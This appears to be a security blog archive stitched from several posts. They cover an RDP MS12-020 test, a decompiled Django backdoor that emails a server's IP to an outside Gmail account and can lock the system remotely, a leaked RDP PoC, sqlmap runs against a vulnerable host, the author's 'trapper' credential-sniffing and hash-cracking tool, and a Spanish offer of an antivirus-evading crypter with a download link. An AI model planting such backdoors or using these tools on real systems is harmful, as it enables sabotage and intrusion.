So I put my gmail address and click test, I don’t have any RDP at my home address but I wanted to see how they do it with closed ports, then I’ll setup an exploitable RDP and let them scan me :) and update this post!

After you click on test you will receive something on the email like this (IP Address removed):

IP address tested: XXX.XXX.XXX.X
Time of test: Sat, 24 Mar 2012 14:50:38 EST
Result: RDP Port Filtered (Inconclusive)

Hmmm… We were unable to determine if we could access Remote Desktop Protocol from the Internet on it’s standard port. When we tested there was no response. This generally means that there is a firewall configured to be invisible – which is a good thing – but it can also be caused by network issues, ISP filtering, etc.
Because of this we cannot make a confident assessment of your exposure.

To err on the safe side you should assume that this means that your network is potentially vulnerable to exploitation of the MS12-020 RDP vulnerability from the Internet and is likely to contain unpatched systems.
Here’s a few things you can do…

Patch ALL of your Windows systems with the MS12-020 patch from Microsoft. To do this simply run Windows Update until it no longer suggests updates, or you can manually download Microsoft security bulletin and patches from Microsoft’s advisory here.

Check that you’ve patched ALL of your systems. Not just the Internet facing ones. When this vulnerability gets turned into an self-propagating RDP worm you’ll thank us for this advice.

Close off port Remote Desktop Services (RDP) to the Internet. RDP runs on TCP port 3389. If this means nothing to you, ask your I.T. guy.

Disable RDP on machines that don’t need it. RDP is fantastically useful, but if you don’t need it, turn it off.

Give your I.T. guy a smack on the wrist and tell him/her to stop running Remote Desktop Protocol on the Internet. This is a risky practice, superbug or no superbug, because it gives full access to a machine. Use a VPN for remote access instead.

From Microsoft: “Consider how you might harden your environment against unauthenticated, attacker-initiated RDP connections.” Some of the tips here are a part of this general advice. If you need more help with this get in touch via our contact form.

Read, understand and action the advice from Microsoft here and here. If none of it makes sense to you, talk to your I.T. guy or get in touch via our contact form.

This is pretty cool and useful at least for the average joe :)

I still wonder … IS THE RDP EXPLOIT OUT YET!?!?!?!?

The problem raised when as soon as they took over the network within the hour a critical system for the business stopped working, this was more than suspicious as before in another business that was also admin by this person before had some files erased and configurations lost when it was transitioned to another admin because of lack of administration and ethics on the admin part.

First I tried to decompile the python files form the Django server, this was because obviously all the servers where blocked but for port 80. My friend innocently forgot to block all access to the internet as he thought that was not that hardcore important (#FAIL) and he didn’t really think this person (who know actually is consulting for a major bank in Mexico) would backdoor and do this type of stuff.

The first thing was to run it on strings to figure out what is there (credentials and paths removed for security reasons):

fsckOSX:~ nahual$ strings py_util.pyc
EmailMultiAlternatives(
MIMEImage(
datetimeN(
Parsers
fxxxxxxxxxxo@gmail.comt
mxxxgyyczzt
LOCKSYSTEMt
UNLOCKSYSTEMt
GETIPs$
/home/xxxxxxx/svn/yyyyyyyy/.python.logc
pop.gmail.comi
Subjectt
bloqueandot
desbloqueandot8
2baa224d0a3515912218fd88c1dd9d90d347c451c67811ac6240f4a1(
poplibt
POP3_SSLt
usert
pass_t
passwdt
Exceptiont
lent
listt
ranget
retrt
joinR
parsestrt
LOCKt
opent
file_logt
writet
closet
UNLOCKR
check_ipt
quit(
errt
numerot
responset
headerLinest
bytest
mensajet
emailt
subjectt
/home/xxxxxxx/svn/yyyyyyy/../yyyyyyy/py_util.pyt
check_locker
setup_environ(
BeautifulSoups
hxxxxxxx3@gmail.comR

http://www.cualesmiip.comt

divt
miipt
IP del servidort
from_emails
text/html(
urllib2t
django.core.managementR/
xml.dom.minidomR0
settingst
urlopent
readt
findt
findAllR
DEFAULT_FROM_EMAILt
attach_alternativet
send(
xmlR0
listmailt
contentt
feedR&
html_contentR,
msg(
/home/xxxxxxx/svn/yyyyyy/../yyyyyy/py_util.pyR
__main__(
django.core.mailR
email.MIMEImageR
smtplibR
email.ParserR
__name__(
/home/xxxxxxxx/svn/yyyyyy/../yyyyy/py_util.pyt

fsckOSX:~ nahual$

py_util.pyc wouldn’t fastly decompile, thus after putting it into IDA and other nice decompile this is what was found (credentials removed for security reasons):


from django.core.mail import EmailMultiAlternatives
from email.MIMEImage import MIMEImage
from datetime import datetime
import smtplib
import poplib
from email.Parser import Parser

def check_ip():
import urllib2
from django.core.management import setup_environ
import xml.dom.minidom
from BeautifulSoup import BeautifulSoup
import settings
setup_environ(settings)
listmail = ['xxxxxxxx@gmail.com']
content = ''
feed = urllib2.urlopen('http://www.google.com')
response = BeautifulSoup(feed.read())
html_content = response.find('div', {'id': 'miip'}).findAll('b')[0]
subject = 'IP del servidor'
msg = EmailMultiAlternatives(subject, content, to=listmail, from_email=settings.DEFAULT_FROM_EMAIL)
msg.attach_alternative(html_content, 'text/html')
msg.send()
if (__name__ == '__main__'):
check_ip()


As you can see the backdoor is pretty small and “efficient”, it checks a gmail account, if an email to that account is sent with the LOCKSYSTEM it will automatically shutdown the application, and you can of course unlock the system with another email.

This might be coded because they thought maybe the client wouldn’t pay them? why would he code something like this without the client consent? no documentation was delivered from the code, and as soon as the admin/developer was let go, the system was shutdown within the hour, sounds to me more like a blackmail function than a current admin function as it only turns off the system, no backups anything.

This makes me wonder why this would be created? or executed? I thought about writing a fast and ugly rule to make sure if anything happened like this again at least the snorts would be alerted and told my friend to lock down the firewall rules, but this lack of ethics is overwhelming, I wonder what the bank would think of him being used to backdoor stuff to keep a foot in the door? jeeeeezzzzz

Snort rule would not really work as it’s doing pop3 over SSL, but then blocking port 993 should lock him out, still … why people do this? don’t they understand this lack of ethics is preposterous?

Has some really short information on the exploit and PoC and obviously who bought it (yes kids ZDI bought this one, gave it to Microsoft and then one of them managed to leak it) but apparently the original exploit code was leaked (complete article HERE)

From the article:

“Chinese hackers have released proof-of-concept code that provides a roadmap to exploit a dangerous RDP (remote desktop protocol) vulnerability that was patched by Microsoft earlier this week.

The publication of the code on a Chinese language forum heightens the urgency to apply Microsoft’s MS12-020 update, which addresses a remote, pre-authentication, network-accessible code execution vulnerability in Microsoft’s implementation of the RDP protocol.”

Well I’m not fluent on Chinese at all, BUT when I went into the website it clearly says on the top:

“0day discount
This BLOG from time to time the market of 0day of exp”

Errr I’m sorry but that does not tell ANYONE to go and patch as the article says, they actually even go further on saying: “Thanks to 360 friends to provide the EXP.” Well apparently 360 guys managed to grab that exploit which apparently has a special signature from the reseracher Luigi Auriemma (@luigi_auriemma)

That is a good practice and I hope it starts out again, watermarking the PoCs so you can see where the leak is, the interesting part is … Who is owned by the chinese? ZDI? or Microsoft? if they leaked that, which others have been leaked?

This bug will end up showing more flaws of handling them and the leaking of it’s PoC than the bug itself!

UPDATE:

On this tweet (https://twitter.com/#!/luigi_auriemma/status/180646548395401216) Luigi Auriemma confirms it was Microsoft the leak.

Luigi Auriemma ‏ @luigi_auriemma
in case isn’t clear yet: rdpclient.exe seems written by Microsoft using the original packet poc I sent to ZDI. MS is the source of the leak

His Advisory can be seen HERE

MS12-020: Vulnerabilities in Remote Desktop could allow remote code execution: March 13, 2012

The interesting is that on this link (http://support.microsoft.com/kb/2671387) it says on the more information tab:

“2667402 MS12-020: Description of the security update for Terminal Server Denial of Service Vulnerability: March 13, 2012″

But then on this link (http://blogs.technet.com/b/msrc/archive/2012/03/13/strength-flexibility-and-the-march-2012-security-bulletins.aspx) they actually talk about a critical one, which means it’s exploitable, which has turned a lot of heads and wonder if this bug will end up being the new MS08-087 due to longevity on it (God knows finding that one will render Enterprise Admin or Domain Admin too quick most of the times anyway)

Let’s see how fast the guys at metasploit project (www.metasploit.com) will come up with an exploit for it!

(NOTE: Thank you so much flacman for catching the typo .. sorry!!!!)

So first things first, getting the Cisco IPS 4255 unracked and get them to the office? NO, ssh into them and try to get the then SOC Monitor Eng to try to do it, as soon as I got into the “maintenance” shell realized it’s an old 2.4.X modified linux with a very (VERY) small disc space of 512 Megs, loaded as read-only with bigmem filesystem to keep the logs.

So first it was to deploy a chrooted image of a linux systems, this has a small challenge, deboostrapped a really old image (that took a bit of tweaking since everything was so old on that box) tarball it and then swear a bit as gcc, glibc, etc was not on the first image and redo the image, this systems have no internet connection for security purposes so it wasn’t a fast apt-get install with old archive repositories.

Then it was to compile snort rules, but … ended up with a very old snort, compiled barnyard and run like that for a week as a test (it wasn’t my project anyway I was just helping the SOC)

First problem:

- Reboot, your chroot system was gone. Why? easy the chroot had to be run within the bigmem partition, which for some weird reason wouldn’t backup our directory so it would wipe it out and put old logs in there (I presume it was a license thing or a signature stuff I wasn’t as interested to make it work)

The demo worked and as the SOC engineer pretty much stood up, grabbed his stuff and left without notice all the sudden .. VOILA! I got the SOC.

First things first and that was to mod OSSIM, which is an entirely different post altogether into an office server and verify that it works and it was what we were looking for.

Then, voila the CISCO IPS were unracked and sent to my office, where I could open them up, facepalm and try to make them work.

So what is on the CISCO IPS 4255?

Short answer: a VERY VERY old 2.4 kernel linux, tricked out and with some stuff, I think I made an image of the 512 MB OS, but I’m sure CISCO wouldn’t be happy if I just linked into it :)

And something interesting happened, sqlmap enumeration broke (gorgeous) but it didn’t look much like it, it baffled me at first, so much that I had to do all by hand and asked psymera if he changed something, he said no.

So this is the info of the updated sqlmap version to that date:


root@fsckOSX:/pentest/database/sqlmap# svn info
Path: .
URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Repository Root: https://svn.sqlmap.org/sqlmap
Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
Revision: 4380
Node Kind: directory
Schedule: normal
Last Changed Author: stamparm
Last Changed Rev: 4380
Last Changed Date: 2011-09-19 12:08:08 -0700 (Mon, 19 Sep 2011)


the SVN rev is 4380, latest at Sep 19th, here is the example of a run against the vulnerable web server with this revision.


root@fuckOSX:/pentest/database/sqlmap# ./sqlmap.py -u "http://XXX.XXX.XXX.XXX/index.php?page=search" --data="search=aaa" --dbs

[*] shutting down at 14:26:24


So note the

available databases [1]:
[*]

This is interesting, it FINDS the database apparently but there is no name for it. This is the part that had me baffled (obviously the table enumeration, the column enumeration failed as it didn't know the database name)

So I started to update back, some versions (such as 4320) would even crash on run (this is normal as sqlmap is a very active project) so after a while i found the last revision that worked


root@fuckOSX:/pentest/database/sqlmap# svn update -r 4319
D _sqlmap.py
U xml/payloads.xml
U plugins/dbms/sybase/enumeration.py
U plugins/generic/enumeration.py
U sqlmap.conf
U sqlmap.py
U doc/FAQ.pdf
U doc/README.html
U doc/README.pdf
U doc/THANKS
U doc/README.sgml
U lib/takeover/web.py
U lib/takeover/metasploit.py
U lib/utils/hash.py
U lib/controller/checks.py
U lib/controller/controller.py
U lib/core/common.py
U lib/core/threads.py
U lib/core/agent.py
U lib/core/settings.py
U lib/core/dump.py
U lib/core/defaults.py
U lib/core/option.py
U lib/core/optiondict.py
U lib/request/connect.py
U lib/request/comparison.py
U lib/request/basic.py
U lib/techniques/blind/inference.py
U lib/techniques/union/use.py
U lib/techniques/union/test.py
U lib/techniques/error/use.py
U lib/parse/cmdline.py
D tamper/unmagicquotes.py
Updated to revision 4319.


Notate how lib/techniques/ had some changes, but changes from latest revision to this one are more than that, so it's a compromise for now.

So here is this revision against the same vulnerable web server.


root@fsckOSX:/pentest/database/sqlmap# ./sqlmap.py -u "http://XXX.XXX.XXX.XXX/index.php?page=search" --data="search=aaa" --dbs

root@fsckOSX:/pentest/database/sqlmap#


Here it is!!!

available databases [1]:
[*] pwnetwork

Just my 2 cents, this has been verified by other people and I hope if someone uses the tool and suddenly scratches his head can rollback to the working revision while sqlmap developers fix this (You guys are awesome keep the excellent work!!!)

I recently catch upon Cenzic having a pretty interesting patent, which basically covers any code that baselines a web page and then injects faulty code into parameters to verify vulnerabilities. Yes you read correctly, this patent awarded in 2007 covers all web scanners and even powerful fuzzers into the patent, why it was granted? beats me I presume whoever checked it out didn’t really find prior art (there is) or really understand what was being patented (go lawyer+techie talk) the result? an overlapping patent.

Now a patent should ALWAYS be used defensively, which means “I protect myself from other people coming and breaking my stuff, asking me for money for something I developed or saying I didn’t create it” the problem is, Cenzic is NOT using the patent defensively, they are using it to get money out of web scanner companies.

IBM/HP already did a cross licensing deal with them, (probably giving them their crawler technology) and now they went and asked NTObjectives an insane amount of money, result? NTObjectives is fighting back, the filed a suit which will then break the patent and stop this company from basically extorting money out of other companies for a very generic and broken patent.

It makes me sad, why? because one of the patent owners is someone I really respect: Greg Hoglund, the founder of rootkit.com, his books are great and I love them, but this patent, this is wrong. It saddens me the fact that someone on the security environment (I hate using the industry word, because grayhats and blackhats are not on the industry but are still on the environment) would do this and let it go.

I created then the website www.stop232patent.com you can follow an in depth detail of the analysis of the patent, trial, prior art, etc.

As the release of trapper was getting closer I started thinking what good would the complete release of the software will do, and I came up with this answers:
- Nothing, nobody would use it
- Some people would use it for kicks, mostly to hack their own networks or hack work
- It could be used to crack something large and big
- Other people would use it on their audits, call me I’m finished and keep on using my research and work.
- Man in black would seize my server (since it’s on the US) and force the app to be erased after magically appearing with a copy of it.

While the last one appears definitely far fetched the third one got me thinking seriously, not only because of the nature of my research has gone definitely into Hydras and AI / Neural Networks / Expert Systems but because potentially sooner or later it could be pushed into the light and someone will do something that would compromise the years I’ve work on the security field.

I’m not calling that a reporter, as the ones I know they have been always fair to me in developing at story, but today as I unleashed the third rewrite of trapper (yes I had to rewrite 2 times already due to redesign of the objects) someone at the starbucks checked their email via pop, in less than 5 minutes all his email was parsed, loged into facebook, found, friends found, had his avatar picture and was searching who he was talking to in MSN. At that second I realized I stupidly left the domain into * and not localhost, definitely my mistake but … it suddenly hit me, am I making stuff secure or insecure releasing this?

The answer was “You are making stuff completely insecure, people won’t understand what is going on, it will be just pure blood and your point across will be lost” so my decision is to open trapper only to a few people without hard modules and keep it for Yaguarete as part of the internal tools, not because I don’t want to, believe me with the design I made a proficient coder will have no trouble to create it’s own little hydra, but it won’t me mine, it won’t be code breaking hard into stuff I seriously do not want to even ping.

YES I’ve become soft, YES I’m not the guy who used to rampage like 10 years ago in G-Con, but then again who would be? are you really a sane person holding into something that happened or said 10 years ago? is your life THAT pathetic?

I’ve seen people come from total “n00bs” into amazing hackers, like HKM I remember him messaging me saying he got hist first overflow after reading a paper then all the sudden he is destroying 2Wire with amazing research, people evolve, everything evolves, why wouldn’t I just evolve?

As I was reading the leaks that might break spies and complete networks of the CIA on Afganistan because of a leak I said “well sure government did stuff they shouldn’t have done? most probably but then again should documents leak THAT harshly?” I’m not condemning or applauding the act I just wondered “what if code I wrote ever is used for that?”

You might not have met me in my “worst” years, when I tough I was invincible, when nobody was smarter than me, more connected than me, etc. but I realize that those years I did more damage than help, I turn around and I smile when people tell me they look up to me and they have shaped cons in the sense of G-Con or stuff like that (I have to say that having someone name his kid after you felt great, thank you Pedro Navarro -byteStriker-)

Anyway I’m still alive, am I the same? no, is my research the same? probably is it still agressive? As much as I need to, because at the end, my research is only for me now, I don’t want any more fame, I don’t want the spotlight anymore, I’ve had my 15 minutes of fame, I want to do what I like, what I want and just be happy (breaking stuff sure why not)

Will trapper ever be public? to be honest it might, just not right now I’d like to keep the advantage before other companies use it and call my company inferior, anyway it will have a mixed license so too bad for ppl that will use it for commercial.

If you are interested in a copy of it, contact me and we can chat but I don’t promise anything.

This is a complete recode of trapper, even changing the language for ruby, having namespaces on it and the capabilities to attack and exploit miss-configurations.

I’m going to be exporting a git repository the first week of August with the public version of Trapper 1.0 in git.security-dojo.com (It’s not setup yet so don’t even try) and version 1.1 should hit around september in Sec-T.

What stuff is being coded or tested now?

- Sniffing
- Cracking the hashes
- Using hashes to bring more hosts into the game
- Reading emails
- Reading applications
- SSH and telnet into hosts
- Start other sniffer heads in different OS (This is going to take time but oh well)
- More to come!

If you are interested in beta testing Trapper drop me an email, you might not get the chance since I’m really picky on who betas my stuff but you can try :P

para ser indetectables a los AV’s

esta tool se basa en que todo los programas ke okupan el runpe como tecnica para ejeucion en memoria

termina siendo igual sin importar el tipo de cambio ke s ele haga

ya ke es un metodo muy poko flexible y porlotanto muy vulnerable

bueno esta herramienta me costo varias semanas de investigacion y desarrollo

esta echa en delphi y masm(primera vez ke trabajo en forma con asm xP)

sin mas aki les dejo este juguetito junto con su screenshot correspondiente

http://www.gigasize.com/get.php?d=b32byccdznf